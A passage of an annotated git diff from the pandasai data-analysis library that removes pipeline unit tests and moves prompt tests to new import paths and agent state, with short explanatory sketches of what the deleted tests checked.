- error_prompt.context = context
-
- # Call the method with the mock exception
- result = error_prompt.get_prompt(mock_exception, "code")
-
- # Assert that the CorrectErrorPrompt is returned
- assert isinstance(result, CorrectErrorPrompt)
diff --git a/tests/unit_tests/pipelines/smart_datalake/test_prompt_generation.py b/tests/unit_tests/pipelines/smart_datalake/test_prompt_generation.py
deleted file mode 100644
index ddc7222a3..000000000
--- a/tests/unit_tests/pipelines/smart_datalake/test_prompt_generation.py
+++ /dev/null
@@ -1,127 +0,0 @@
-from typing import Optional
-
-import pandas as pd
-import pytest
-
-from pandasai.dataframe.base import DataFrame
-from pandasai.helpers.dataframe_serializer import DataframeSerializerType
-from pandasai.llm.fake import FakeLLM
-from pandasai.pipelines.chat.prompt_generation import PromptGeneration
-from pandasai.pipelines.pipeline_context import PipelineContext
-from pandasai.prompts.generate_python_code import GeneratePythonCodePrompt
-from pandasai.prompts.generate_python_code_with_sql import (
- GeneratePythonCodeWithSQLPrompt,
-)
-
-
-class TestPromptGeneration:
- "Unit test for Prompt Generation"
-
- @pytest.fixture
- def llm(self, output: Optional[str] = None):
- return FakeLLM(output=output)
-
- @pytest.fixture
- def sample_df(self):
- return pd.DataFrame(
- {
- "country": [
- "United States",
- "United Kingdom",
- "France",
- "Germany",
- "Italy",
- "Spain",
- "Canada",
- "Australia",
- "Japan",
- "China",
- ],
- "gdp": [
- 19294482071552,
- 2891615567872,
- 2411255037952,
- 3435817336832,
- 1745433788416,
- 1181205135360,
- 1607402389504,
- 1490967855104,
- 4380756541440,
- 14631844184064,
- ],
- "happiness_index": [
- 6.94,
- 7.16,
- 6.66,
- 7.07,
- 6.38,
- 6.4,
- 7.23,
- 7.22,
- 5.87,
- 5.12,
- ],
- }
- )
-
- @pytest.fixture
- def dataframe(self, sample_df):
- return DataFrame(sample_df)
-
- @pytest.fixture
- def config(self, llm):
- return {"llm": llm, "enable_cache": True}
-
- @pytest.fixture
- def context(self, dataframe, config):
- return PipelineContext([dataframe], config)
-
- def test_init(self):
- # Test the initialization of the PromptGeneration
- prompt_generation = PromptGeneration()
- assert isinstance(prompt_generation, PromptGeneration)
-
- def test_get_chat_prompt(self, context):
- # Test case 1: direct_sql is True
- prompt_generation = PromptGeneration()
- context.config.direct_sql = True
-
- gen_prompt = prompt_generation.get_chat_prompt(context)
- assert isinstance(gen_prompt, GeneratePythonCodeWithSQLPrompt)
-
- # Test case 2: direct_sql is False
- context.config.direct_sql = False
-
- gen_prompt = prompt_generation.get_chat_prompt(context)
- assert isinstance(gen_prompt, GeneratePythonCodePrompt)
-
- def test_get_chat_prompt_enforce_privacy(self, context):
- # enforce_privacy is True: samples are excluded from the prompt
- prompt_generation = PromptGeneration()
- context.config.enforce_privacy = True
-
- gen_prompt = prompt_generation.get_chat_prompt(context)
- assert isinstance(gen_prompt, GeneratePythonCodePrompt)
- assert "samples" not in gen_prompt.to_string()
-
- def test_get_chat_prompt_enforce_privacy_false(self, context):
- # enforce_privacy is False: samples are included in the prompt
- prompt_generation = PromptGeneration()
- context.config.enforce_privacy = False
- context.config.dataframe_serializer = DataframeSerializerType.YML
-
- gen_prompt = prompt_generation.get_chat_prompt(context)
- assert isinstance(gen_prompt, GeneratePythonCodePrompt)
- assert "samples" in gen_prompt.to_string()
-
- def test_get_chat_prompt_enforce_privacy_true_custom_head(self, context, sample_df):
- # enforce_privacy is True with a custom head and CSV serializer
- prompt_generation = PromptGeneration()
- context.config.enforce_privacy = True
- context.config.dataframe_serializer = DataframeSerializerType.CSV
-
- dataframe = DataFrame(sample_df)
- context.dfs = [dataframe]
-
- gen_prompt = prompt_generation.get_chat_prompt(context)
- assert isinstance(gen_prompt, GeneratePythonCodePrompt)
diff --git a/tests/unit_tests/pipelines/smart_datalake/test_result_parsing.py b/tests/unit_tests/pipelines/smart_datalake/test_result_parsing.py
deleted file mode 100644
index cb0195422..000000000
--- a/tests/unit_tests/pipelines/smart_datalake/test_result_parsing.py
+++ /dev/null
@@ -1,133 +0,0 @@
-from typing import Optional
-from unittest.mock import Mock
-
-import pytest
-
-from pandasai.dataframe.base import DataFrame
-from pandasai.helpers.logger import Logger
-from pandasai.llm.fake import FakeLLM
-from pandasai.pipelines.chat.result_parsing import ResultParsing
-from pandasai.pipelines.pipeline_context import PipelineContext
-
-
-class TestResultParsing:
- "Unit test for Result Parsing"
-
- throw_exception = True
-
- @pytest.fixture
- def llm(self, output: Optional[str] = None):
- return FakeLLM(output=output)
-
- @pytest.fixture
- def sample_df(self):
- return DataFrame(
- {
- "country": [
- "United States",
- "United Kingdom",
- "France",
- "Germany",
- "Italy",
- "Spain",
- "Canada",
- "Australia",
- "Japan",
- "China",
- ],
- "gdp": [
- 19294482071552,
- 2891615567872,
- 2411255037952,
- 3435817336832,
- 1745433788416,
- 1181205135360,
- 1607402389504,
- 1490967855104,
- 4380756541440,
- 14631844184064,
- ],
- "happiness_index": [
- 6.94,
- 7.16,
- 6.66,
- 7.07,
- 6.38,
- 6.4,
- 7.23,
- 7.22,
- 5.87,
- 5.12,
- ],
- }
- )
-
- @pytest.fixture
- def config(self, llm):
- return {"llm": llm, "enable_cache": True}
-
- @pytest.fixture
- def context(self, sample_df, config):
- return PipelineContext([sample_df], config)
-
- @pytest.fixture
- def logger(self):
- return Logger(True, False)
-
- def test_init(self, context, config):
- # Test the initialization of the ResultParsing
- result_parsing = ResultParsing()
- assert isinstance(result_parsing, ResultParsing)
-
- def test_result_parsing_successful_with_no_exceptions(self, context, logger):
- # Test Flow : Result Parsing successful with no exceptions
- result_parsing = ResultParsing()
- result_parsing._add_result_to_memory = Mock()
- mock_response_parser = Mock()
-
- def mock_intermediate_values(key: str):
- if key == "response_parser":
- return mock_response_parser
-
- context.get = Mock(side_effect=mock_intermediate_values)
-
- result = result_parsing.execute(
- input={"type": "string", "value": "Test Result"},
- context=context,
- logger=logger,
- )
-
- assert isinstance(result_parsing, ResultParsing)
- assert result.output == "Test Result"
- assert result.success is True
- assert result.message == "Results parsed successfully"
- assert result.metadata is None
-
- def test_result_parsing_unsuccessful_with_exceptions(self, context, logger):
- # Test Flow : Result Parsing unsuccessful with exceptions
- result_parsing = ResultParsing()
- result_parsing._add_result_to_memory = Mock()
- mock_response_parser = Mock()
-
- def mock_result_parsing(*args, **kwargs):
- raise Exception("Unit test exception")
-
- def mock_intermediate_values(key: str):
- if key == "response_parser":
- return mock_response_parser
-
- context.get = Mock(side_effect=mock_intermediate_values)
-
- result = None
- try:
- result = result_parsing.execute(
- input="Test Result", context=context, logger=logger
- )
- except Exception:
- assert result is None
- assert isinstance(result_parsing, ResultParsing)
-
- def test_add_number_result_to_memory(self, context):
- result_parsing = ResultParsing()
- result_parsing.execute(input={"type": "number", "value": 42}, context=context)
- assert context.memory.last()["message"] == "42"
diff --git a/tests/unit_tests/pipelines/smart_datalake/test_result_validation.py b/tests/unit_tests/pipelines/smart_datalake/test_result_validation.py
deleted file mode 100644
index 396cad90d..000000000
--- a/tests/unit_tests/pipelines/smart_datalake/test_result_validation.py
+++ /dev/null
@@ -1,135 +0,0 @@
-from typing import Optional
-from unittest.mock import Mock
-
-import pytest
-
-from pandasai.dataframe.base import DataFrame
-from pandasai.helpers.logger import Logger
-from pandasai.llm.fake import FakeLLM
-from pandasai.pipelines.chat.result_validation import ResultValidation
-from pandasai.pipelines.pipeline_context import PipelineContext
-
-
-class TestResultValidation:
- "Unit test for Result Validation"
-
- throw_exception = True
-
- @pytest.fixture
- def llm(self, output: Optional[str] = None):
- return FakeLLM(output=output)
-
- @pytest.fixture
- def sample_df(self):
- return DataFrame(
- {
- "country": [
- "United States",
- "United Kingdom",
- "France",
- "Germany",
- "Italy",
- "Spain",
- "Canada",
- "Australia",
- "Japan",
- "China",
- ],
- "gdp": [
- 19294482071552,
- 2891615567872,
- 2411255037952,
- 3435817336832,
- 1745433788416,
- 1181205135360,
- 1607402389504,
- 1490967855104,
- 4380756541440,
- 14631844184064,
- ],
- "happiness_index": [
- 6.94,
- 7.16,
- 6.66,
- 7.07,
- 6.38,
- 6.4,
- 7.23,
- 7.22,
- 5.87,
- 5.12,
- ],
- }
- )
-
- @pytest.fixture
- def config(self, llm):
- return {"llm": llm, "enable_cache": True}
-
- @pytest.fixture
- def context(self, sample_df, config):
- return PipelineContext([sample_df], config)
-
- @pytest.fixture
- def logger(self):
- return Logger(True, False)
-
- def test_init(self, context, config):
- # Test the initialization of the ResultValidation
- result_validation = ResultValidation()
- assert isinstance(result_validation, ResultValidation)
-
- def test_result_is_none(self, context, logger):
- # Test Flow : a None result passes through unchanged
- result_validation = ResultValidation()
-
- result = result_validation.execute(input=None, context=context, logger=logger)
-
- print(result)
-
- assert isinstance(result_validation, ResultValidation)
- assert result.output is None
-
- def test_result_is_not_of_dict_type(self, context, logger):
- # Test Flow : a non-dict result is returned with success=False
- result_validation = ResultValidation()
-
- result = result_validation.execute(
- input="Not Dict Type Result", context=context, logger=logger
- )
-
- assert isinstance(result_validation, ResultValidation)
- assert result.output == "Not Dict Type Result"
- assert result.success is False
- assert result.message is None
-
- def test_result_is_of_dict_type_and_valid(self, context, logger):
- # Test Flow : a dict result that passes output validation
- context.get = Mock(return_value="")
-
- result_validation = ResultValidation()
- result = result_validation.execute(
- input={"Mocked": "Result"}, context=context, logger=logger
- )
-
- assert isinstance(result_validation, ResultValidation)
- assert result.output == {"Mocked": "Result"}
- assert result.success is True
- assert result.message == "Output Validation Successful"
-
- def test_result_is_of_dict_type_and_not_valid(self, context, logger):
- # Test Flow : a dict result that fails output validation
- result_validation = ResultValidation()
- output_type = Mock()
-
- context.get = Mock(return_value=output_type)
- output_type.validate = Mock(return_value=(False, "Mocked Logs"))
-
- result = result_validation.execute(
- input={"Mocked": "Result"}, context=context, logger=logger
- )
-
- assert isinstance(result_validation, ResultValidation)
- assert result.output == {"Mocked": "Result"}
- assert result.success is False
- assert result.message == "Output Validation Failed"
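The deleted tests above pinned down a small contract for the result-validation step: a None result passes through, a non-dict result comes back with success=False and no message, and a dict result is checked against the configured output type. A minimal stand-in sketch of that contract (StepOutput and validate_result are illustrative names, not the real ResultValidation/LogicUnitOutput API):

from dataclasses import dataclass
from typing import Any, Callable, Optional

@dataclass
class StepOutput:
    # Stand-in for the pipeline's logic-unit output: value, flag, message.
    output: Any
    success: bool = False
    message: Optional[str] = None

def validate_result(result: Any, validator: Optional[Callable[[dict], bool]] = None) -> StepOutput:
    if result is None:
        return StepOutput(None)
    if not isinstance(result, dict):
        return StepOutput(result, success=False)
    if validator is None or validator(result):
        return StepOutput(result, success=True, message="Output Validation Successful")
    return StepOutput(result, success=False, message="Output Validation Failed")

assert validate_result(None).output is None
assert validate_result("Not Dict Type Result").success is False
assert validate_result({"Mocked": "Result"}).message == "Output Validation Successful"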
diff --git a/tests/unit_tests/pipelines/smart_datalake/test_validate_pipeline_input.py b/tests/unit_tests/pipelines/smart_datalake/test_validate_pipeline_input.py
deleted file mode 100644
index 426e7629a..000000000
--- a/tests/unit_tests/pipelines/smart_datalake/test_validate_pipeline_input.py
+++ /dev/null
@@ -1,239 +0,0 @@
-from typing import Optional
-
-import pandas as pd
-import pytest
-
-from pandasai.dataframe.base import DataFrame
-from pandasai.exceptions import InvalidConfigError
-from pandasai.helpers.logger import Logger
-from pandasai.llm.fake import FakeLLM
-from pandasai.pipelines.chat.validate_pipeline_input import (
- ValidatePipelineInput,
-)
-from pandasai.pipelines.logic_unit_output import LogicUnitOutput
-from pandasai.pipelines.pipeline_context import PipelineContext
-
-
-class TestValidatePipelineInput:
- "Unit test for Validate Pipeline Input"
-
- @pytest.fixture
- def llm(self, output: Optional[str] = None):
- return FakeLLM(output=output)
-
- @pytest.fixture
- def sample_df(self):
- return pd.DataFrame(
- {
- "country": [
- "United States",
- "United Kingdom",
- "France",
- "Germany",
- "Italy",
- "Spain",
- "Canada",
- "Australia",
- "Japan",
- "China",
- ],
- "gdp": [
- 19294482071552,
- 2891615567872,
- 2411255037952,
- 3435817336832,
- 1745433788416,
- 1181205135360,
- 1607402389504,
- 1490967855104,
- 4380756541440,
- 14631844184064,
- ],
- "happiness_index": [
- 6.94,
- 7.16,
- 6.66,
- 7.07,
- 6.38,
- 6.4,
- 7.23,
- 7.22,
- 5.87,
- 5.12,
- ],
- }
- )
-
- @pytest.fixture
- def sql_connector(self):
- return DataFrame(
- {
- "country": [
- "United States",
- "United Kingdom",
- "France",
- "Germany",
- "Italy",
- "Spain",
- "Canada",
- "Australia",
- "Japan",
- "China",
- ],
- "gdp": [
- 19294482071552,
- 2891615567872,
- 2411255037952,
- 3435817336832,
- 1745433788416,
- 1181205135360,
- 1607402389504,
- 1490967855104,
- 4380756541440,
- 14631844184064,
- ],
- "happiness_index": [
- 6.94,
- 7.16,
- 6.66,
- 7.07,
- 6.38,
- 6.4,
- 7.23,
- 7.22,
- 5.87,
- 5.12,
- ],
- }
- )
-
- @pytest.fixture
- def pgsql_connector(self):
- return DataFrame(
- {
- "country": [
- "United States",
- "United Kingdom",
- "France",
- "Germany",
- "Italy",
- "Spain",
- "Canada",
- "Australia",
- "Japan",
- "China",
- ],
- "gdp": [
- 19294482071552,
- 2891615567872,
- 2411255037952,
- 3435817336832,
- 1745433788416,
- 1181205135360,
- 1607402389504,
- 1490967855104,
- 4380756541440,
- 14631844184064,
- ],
- "happiness_index": [
- 6.94,
- 7.16,
- 6.66,
- 7.07,
- 6.38,
- 6.4,
- 7.23,
- 7.22,
- 5.87,
- 5.12,
- ],
- }
- )
-
- @pytest.fixture
- def config(self, llm):
- return {"llm": llm, "enable_cache": True}
-
- @pytest.fixture
- def context(self, sample_df, config):
- return PipelineContext([sample_df], config)
-
- @pytest.fixture
- def logger(self):
- return Logger(True, False)
-
- def test_init(self, context, config):
- # Test the initialization of the CodeGenerator
- code_generator = ValidatePipelineInput()
- assert isinstance(code_generator, ValidatePipelineInput)
-
- def test_validate_input_with_direct_sql_false_and_non_connector(
- self, context, logger
- ):
- input_validator = ValidatePipelineInput()
-
- result = input_validator.execute(input="test", context=context, logger=logger)
-
- assert result.output == "test"
-
- def test_validate_input_with_direct_sql_true_and_non_connector(
- self, sample_df, llm, logger
- ):
- input_validator = ValidatePipelineInput()
-
- # context for true config
- config = {"llm": llm, "enable_cache": True, "direct_sql": True}
-
- context = PipelineContext([sample_df], config)
- with pytest.raises(InvalidConfigError):
- input_validator.execute(input="test", context=context, logger=logger)
-
- def test_validate_input_with_direct_sql_false_and_connector(
- self, sample_df, llm, logger, sql_connector
- ):
- input_validator = ValidatePipelineInput()
-
- # context for true config
- config = {"llm": llm, "enable_cache": True, "direct_sql": False}
-
- context = PipelineContext([sample_df, sql_connector], config)
- result = input_validator.execute(input="test", context=context, logger=logger)
- assert isinstance(result, LogicUnitOutput)
- assert result.output == "test"
-
- def test_validate_input_with_direct_sql_true_and_connector(
- self, sample_df, llm, logger, sql_connector
- ):
- input_validator = ValidatePipelineInput()
-
- # context for true config
- config = {"llm": llm, "enable_cache": True, "direct_sql": True}
-
- context = PipelineContext([sql_connector], config)
- result = input_validator.execute(input="test", context=context, logger=logger)
- assert isinstance(result, LogicUnitOutput)
- assert result.output == "test"
-
- def test_validate_input_with_direct_sql_true_and_connector_pandasdf(
- self, sample_df, llm, logger, sql_connector
- ):
- input_validator = ValidatePipelineInput()
-
- # context for true config
- config = {"llm": llm, "enable_cache": True, "direct_sql": True}
-
- context = PipelineContext([sample_df, sql_connector], config)
- with pytest.raises(InvalidConfigError):
- input_validator.execute(input="test", context=context, logger=logger)
-
- def test_validate_input_with_direct_sql_true_and_different_type_connector(
- self, pgsql_connector, llm, logger, sql_connector
- ):
- input_validator = ValidatePipelineInput()
-
- # context for true config
- config = {"llm": llm, "enable_cache": True, "direct_sql": True}
-
- context = PipelineContext([pgsql_connector, sql_connector], config)
- with pytest.raises(InvalidConfigError):
- input_validator.execute(input="test", context=context, logger=logger)
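Read together, the deleted direct_sql tests encoded one rule: with direct_sql enabled, every input must be an SQL connector and all connectors must be of a single type; with it disabled, any mix is accepted. (The fixtures here were mechanically converted to plain DataFrames, so the rule is clearer in the test names than in the fixture bodies.) A hedged sketch of that rule, where is_sql_connector is a hypothetical marker attribute rather than pandasai's real check:

class InvalidConfigError(Exception):
    pass

def validate_direct_sql(dfs: list, direct_sql: bool) -> bool:
    if not direct_sql:
        return True
    # Hypothetical marker: every input must look like an SQL connector.
    if not all(getattr(df, "is_sql_connector", False) for df in dfs):
        raise InvalidConfigError("direct_sql requires SQL connectors only")
    # ...and all connectors must be of a single type.
    if len({type(df) for df in dfs}) > 1:
        raise InvalidConfigError("direct_sql requires connectors of a single type")
    return True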
diff --git a/tests/unit_tests/pipelines/test_pipeline.py b/tests/unit_tests/pipelines/test_pipeline.py
deleted file mode 100644
index 536e72750..000000000
--- a/tests/unit_tests/pipelines/test_pipeline.py
+++ /dev/null
@@ -1,163 +0,0 @@
-from typing import Any, Optional
-from unittest.mock import Mock
-
-import pandas as pd
-import pytest
-
-from pandasai.dataframe.base import DataFrame
-from pandasai.helpers.logger import Logger
-from pandasai.llm.fake import FakeLLM
-from pandasai.pipelines.base_logic_unit import BaseLogicUnit
-from pandasai.pipelines.pipeline import Pipeline
-from pandasai.pipelines.pipeline_context import PipelineContext
-from pandasai.schemas.df_config import Config
-
-
-class MockLogicUnit(BaseLogicUnit):
- def execute(self, input: Any, **kwargs) -> Any:
- pass
-
-
-class TestPipeline:
- @pytest.fixture
- def llm(self, output: Optional[str] = None):
- return FakeLLM(output=output)
-
- @pytest.fixture
- def sample_df(self):
- return pd.DataFrame(
- {
- "country": [
- "United States",
- "United Kingdom",
- "France",
- "Germany",
- "Italy",
- "Spain",
- "Canada",
- "Australia",
- "Japan",
- "China",
- ],
- "gdp": [
- 19294482071552,
- 2891615567872,
- 2411255037952,
- 3435817336832,
- 1745433788416,
- 1181205135360,
- 1607402389504,
- 1490967855104,
- 4380756541440,
- 14631844184064,
- ],
- "happiness_index": [
- 6.94,
- 7.16,
- 6.66,
- 7.07,
- 6.38,
- 6.4,
- 7.23,
- 7.22,
- 5.87,
- 5.12,
- ],
- }
- )
-
- @pytest.fixture
- def dataframe(self, sample_df):
- return DataFrame(sample_df)
-
- @pytest.fixture
- def config(self, llm):
- return {"llm": llm, "enable_cache": False}
-
- @pytest.fixture
- def context(self, sample_df, config):
- return PipelineContext([sample_df], config)
-
- @pytest.fixture
- def logger(self):
- return Logger(True, False)
-
- def test_init(self, context, config):
- # Test the initialization of the Pipeline
- pipeline = Pipeline(context)
- assert isinstance(pipeline, Pipeline)
- assert pipeline._context.config == Config(**config)
- assert pipeline._context == context
- assert pipeline._steps == []
-
- def test_init_with_agent(self, dataframe, config):
- # Test the initialization of the Pipeline
- pipeline = Pipeline([dataframe], config=config)
- assert isinstance(pipeline, Pipeline)
- assert len(pipeline._context.dfs) == 1
- assert isinstance(pipeline._context.dfs[0], DataFrame)
-
- def test_init_with_dfs(self, dataframe, config):
- # Test the initialization of the Pipeline
- pipeline = Pipeline([dataframe], config=config)
- assert isinstance(pipeline, Pipeline)
- assert len(pipeline._context.dfs) == 1
- assert isinstance(pipeline._context.dfs[0], DataFrame)
-
- def test_add_step(self, context, config):
- # Test the add_step method
- pipeline = Pipeline(context, config=config)
- logic_unit = MockLogicUnit()
- pipeline.add_step(logic_unit)
- assert len(pipeline._steps) == 1
- assert pipeline._steps[0] == logic_unit
-
- def test_add_step_using_constructor(self, context, config):
- logic_unit = MockLogicUnit()
- pipeline = Pipeline(context, steps=[logic_unit])
- assert len(pipeline._steps) == 1
- assert pipeline._steps[0] == logic_unit
-
- def test_add_step_unknown_logic_unit(self, context, config):
- pipeline = Pipeline(context)
- with pytest.raises(Exception):
- pipeline.add_step(Mock())
-
- def test_run(self, context, config):
- # Test the run method
- pipeline = Pipeline(context)
-
- class MockLogicUnit(BaseLogicUnit):
- def execute(self, data, logger, config, context):
- return "MockData"
-
- pipeline.add_step(MockLogicUnit())
- result = pipeline.run("InitialData")
- assert result == "MockData"
-
- def test_run_with_exception(self, context, config):
- # Test the run method with a mock logic unit that raises an exception
- pipeline = Pipeline(context)
-
- class MockLogicUnit(BaseLogicUnit):
- def execute(self, data, logger, config, context):
- raise Exception("Mock exception")
-
- pipeline.add_step(MockLogicUnit())
- with pytest.raises(Exception):
- pipeline.run("InitialData")
-
- def test_run_with_empty_pipeline(self, context, config):
- pipeline_3 = Pipeline(context, [])
- result = pipeline_3.run(5)
- assert result == 5
-
- def test_run_with_multiple_steps(self, context, config):
- class MockLogic(BaseLogicUnit):
- def execute(self, data, logger, config, context):
- return data + 1
-
- pipeline_2 = Pipeline(context, steps=[MockLogic(), MockLogic(), MockLogic()])
-
- result = pipeline_2.run(5)
- assert result == 8
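test_run_with_multiple_steps and test_run_with_empty_pipeline above document the essential run loop: the input is folded through the steps, each step consuming the previous step's output, and an empty pipeline is the identity. A minimal stand-in (not pandasai's Pipeline, which also threads logger/config/context through each step):

class MiniPipeline:
    def __init__(self, steps=None):
        self._steps = list(steps or [])

    def run(self, data):
        # Fold the input through the steps; each consumes the previous output.
        for step in self._steps:
            data = step(data)
        return data

inc = lambda x: x + 1
assert MiniPipeline([inc, inc, inc]).run(5) == 8  # mirrors test_run_with_multiple_steps
assert MiniPipeline().run(5) == 5                 # mirrors test_run_with_empty_pipeline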
diff --git a/tests/unit_tests/prompts/test_correct_error_prompt.py b/tests/unit_tests/prompts/test_correct_error_prompt.py
index 917d4d2e1..648f189a0 100644
--- a/tests/unit_tests/prompts/test_correct_error_prompt.py
+++ b/tests/unit_tests/prompts/test_correct_error_prompt.py
@@ -6,7 +6,7 @@
from pandasai.dataframe.base import DataFrame
from pandasai.helpers.dataframe_serializer import DataframeSerializerType
from pandasai.llm.fake import FakeLLM
-from pandasai.prompts import CorrectErrorPrompt
+from pandasai.core.prompts.correct_error_prompt import CorrectErrorPrompt
class TestCorrectErrorPrompt:
@@ -21,7 +21,7 @@ def test_str_with_args(self):
config={"llm": llm, "dataframe_serializer": DataframeSerializerType.CSV},
)
prompt = CorrectErrorPrompt(
- context=agent.context, code="df.head()", error="Error message"
+ context=agent._state, code="df.head()", error="Error message"
)
prompt_content = prompt.to_string()
if sys.platform.startswith("win"):
@@ -56,7 +56,7 @@ def test_to_json(self):
config={"llm": llm, "dataframe_serializer": DataframeSerializerType.CSV},
)
prompt = CorrectErrorPrompt(
- context=agent.context, code="df.head()", error="Error message"
+ context=agent._state, code="df.head()", error="Error message"
)
assert prompt.to_json() == {
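The two changes in this hunk repeat across all the prompt tests below: prompt classes now live under pandasai.core.prompts, and prompts are constructed from the agent's internal _state instead of the old public context attribute. In shorthand (import paths and argument names copied from the hunks, not invented):

# Before:
#   from pandasai.prompts import CorrectErrorPrompt
#   prompt = CorrectErrorPrompt(context=agent.context, code="df.head()", error="Error message")
# After:
#   from pandasai.core.prompts.correct_error_prompt import CorrectErrorPrompt
#   prompt = CorrectErrorPrompt(context=agent._state, code="df.head()", error="Error message")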
diff --git a/tests/unit_tests/prompts/test_generate_python_code_prompt.py b/tests/unit_tests/prompts/test_generate_python_code_prompt.py
index c01cd111c..a1e630d5e 100644
--- a/tests/unit_tests/prompts/test_generate_python_code_prompt.py
+++ b/tests/unit_tests/prompts/test_generate_python_code_prompt.py
@@ -10,7 +10,7 @@
from pandasai.dataframe.base import DataFrame
from pandasai.helpers.dataframe_serializer import DataframeSerializerType
from pandasai.llm.fake import FakeLLM
-from pandasai.prompts import GeneratePythonCodePrompt
+from pandasai.core.prompts.generate_python_code import GeneratePythonCodePrompt
class TestGeneratePythonCodePrompt:
@@ -63,7 +63,7 @@ def test_str_with_args(self, output_type, output_type_template):
config={"llm": llm, "dataframe_serializer": DataframeSerializerType.CSV},
)
prompt = GeneratePythonCodePrompt(
- context=agent.context,
+ context=agent._state,
output_type=output_type,
)
@@ -129,7 +129,7 @@ def test_str_with_args(self, output_type, output_type_template):
]
],
)
- @patch("pandasai.vectorstores.bamboo_vectorstore.BambooVectorStore")
+ @patch("pandasai.vectorstores.VectorStore")
def test_str_with_train_qa(self, chromadb_mock, output_type, output_type_template):
"""Test casting of prompt to string and interpolation of context.
@@ -150,10 +150,11 @@ def test_str_with_train_qa(self, chromadb_mock, output_type, output_type_templat
agent = Agent(
DataFrame({"a": [1], "b": [4]}),
config={"llm": llm, "dataframe_serializer": DataframeSerializerType.CSV},
+ vectorstore=chromadb_instance,
)
agent.train(["query1"], ["code1"])
prompt = GeneratePythonCodePrompt(
- context=agent.context,
+ context=agent._state,
output_type=output_type,
)
@@ -225,7 +226,7 @@ def test_str_with_train_qa(self, chromadb_mock, output_type, output_type_templat
]
],
)
- @patch("pandasai.vectorstores.bamboo_vectorstore.BambooVectorStore")
+ @patch("pandasai.vectorstores.VectorStore")
def test_str_with_train_docs(
self, chromadb_mock, output_type, output_type_template
):
@@ -249,7 +250,7 @@ def test_str_with_train_docs(
)
agent.train(docs=["document1"])
prompt = GeneratePythonCodePrompt(
- context=agent.context,
+ context=agent._state,
output_type=output_type,
)
@@ -321,7 +322,7 @@ def test_str_with_train_docs(
]
],
)
- @patch("pandasai.vectorstores.bamboo_vectorstore.BambooVectorStore")
+ @patch("pandasai.vectorstores.VectorStore")
def test_str_with_train_docs_and_qa(
self, chromadb_mock, output_type, output_type_template
):
@@ -349,7 +350,7 @@ def test_str_with_train_docs_and_qa(
)
agent.train(queries=["query1"], codes=["code1"], docs=["document1"])
prompt = GeneratePythonCodePrompt(
- context=agent.context,
+ context=agent._state,
output_type=output_type,
)
@@ -395,7 +396,7 @@ def test_str_with_train_docs_and_qa(
assert actual_prompt_content == expected_prompt_content
- @patch("pandasai.vectorstores.bamboo_vectorstore.BambooVectorStore")
+ @patch("pandasai.vectorstores.VectorStore")
def test_str_geenerate_code_prompt_to_json(self, chromadb_mock):
"""Test casting of prompt to string and interpolation of context.
@@ -418,7 +419,7 @@ def test_str_geenerate_code_prompt_to_json(self, chromadb_mock):
)
agent.train(queries=["query1"], codes=["code1"], docs=["document1"])
prompt = GeneratePythonCodePrompt(
- context=agent.context, viz_lib="", output_type=None
+ context=agent._state, viz_lib="", output_type=None
)
prompt_json = prompt.to_json()
if sys.platform.startswith("win"):
@@ -459,7 +460,7 @@ def test_str_geenerate_code_prompt_to_json(self, chromadb_mock):
]
],
)
- @patch("pandasai.vectorstores.bamboo_vectorstore.BambooVectorStore")
+ @patch("pandasai.vectorstores.VectorStore")
def test_str_relations(self, chromadb_mock, output_type, output_type_template):
"""Test casting of prompt to string and interpolation of context.
@@ -484,7 +485,7 @@ def test_str_relations(self, chromadb_mock, output_type, output_type_template):
)
agent.train(["query1"], ["code1"])
prompt = GeneratePythonCodePrompt(
- context=agent.context,
+ context=agent._state,
output_type=output_type,
)
diff --git a/tests/unit_tests/prompts/test_sql_prompt.py b/tests/unit_tests/prompts/test_sql_prompt.py
index 97b8be7be..bceee84bc 100644
--- a/tests/unit_tests/prompts/test_sql_prompt.py
+++ b/tests/unit_tests/prompts/test_sql_prompt.py
@@ -9,7 +9,7 @@
from pandasai import Agent
from pandasai.helpers.dataframe_serializer import DataframeSerializerType
from pandasai.llm.fake import FakeLLM
-from pandasai.prompts.generate_python_code_with_sql import (
+from pandasai.core.prompts.generate_python_code_with_sql import (
GeneratePythonCodeWithSQLPrompt,
)
@@ -53,28 +53,26 @@ def test_str_with_args(self, output_type, output_type_template):
llm = FakeLLM()
agent = Agent(
pai.DataFrame(),
- config={"llm": llm, "dataframe_serializer": DataframeSerializerType.YML},
+ config={"llm": llm},
)
prompt = GeneratePythonCodeWithSQLPrompt(
- context=agent.context,
+ context=agent._state,
output_type=output_type,
)
prompt_content = prompt.to_string()
if sys.platform.startswith("win"):
prompt_content = prompt_content.replace("\r\n", "\n")
+ print(prompt_content)
+
assert (
prompt_content
== f'''
-dfs[0]:
- name: null
- description: null
- type: pd.DataFrame
- rows: 0
- columns: 0
- schema:
- fields: []
+
+dfs[0]:0x0
+
+
diff --git a/tests/unit_tests/responses/test_response_serializer.py b/tests/unit_tests/responses/test_response_serializer.py
deleted file mode 100644
index 1d363061a..000000000
--- a/tests/unit_tests/responses/test_response_serializer.py
+++ /dev/null
@@ -1,34 +0,0 @@
-import unittest
-
-import pandas as pd
-
-from pandasai.responses.response_serializer import ResponseSerializer
-
-
-class TestResponseSerializer(unittest.TestCase):
- def setUp(self) -> None:
- self.serializer = ResponseSerializer()
- self.df = pd.DataFrame({"A": [1, 2, 3], "B": [4, 5, 6]})
- self.series = pd.Series([1, 2, 3])
- self.response_type_df = {"type": "dataframe", "value": self.df}
- self.response_type_series = {"type": "dataframe", "value": self.series}
- self.response_type_plot = {"type": "plot", "value": "path_to_image.png"}
-
- def test_serialize_dataframe(self) -> None:
- result = self.serializer.serialize_dataframe(self.df)
- self.assertEqual(result["headers"], list(self.df.columns))
- self.assertEqual(result["rows"], self.df.values.tolist())
-
- def test_serialize_dataframe_from_series(self) -> None:
- result = self.serializer.serialize(self.response_type_series)
- self.assertEqual(
- result["value"]["headers"], list(self.series.to_frame().columns)
- )
- self.assertEqual(
- result["value"]["rows"], self.series.to_frame().values.tolist()
- )
-
- def test_serialize_dataframe_from_df(self) -> None:
- result = self.serializer.serialize(self.response_type_df)
- self.assertEqual(result["value"]["headers"], list(self.df.columns))
- self.assertEqual(result["value"]["rows"], self.df.values.tolist())
diff --git a/tests/unit_tests/schemas/__init__.py b/tests/unit_tests/schemas/__init__.py
deleted file mode 100644
index e69de29bb..000000000
diff --git a/tests/unit_tests/schemas/test_df_config.py b/tests/unit_tests/schemas/test_df_config.py
deleted file mode 100644
index 57431e188..000000000
--- a/tests/unit_tests/schemas/test_df_config.py
+++ /dev/null
@@ -1,18 +0,0 @@
-import os
-
-from pandasai.llm.bamboo_llm import BambooLLM
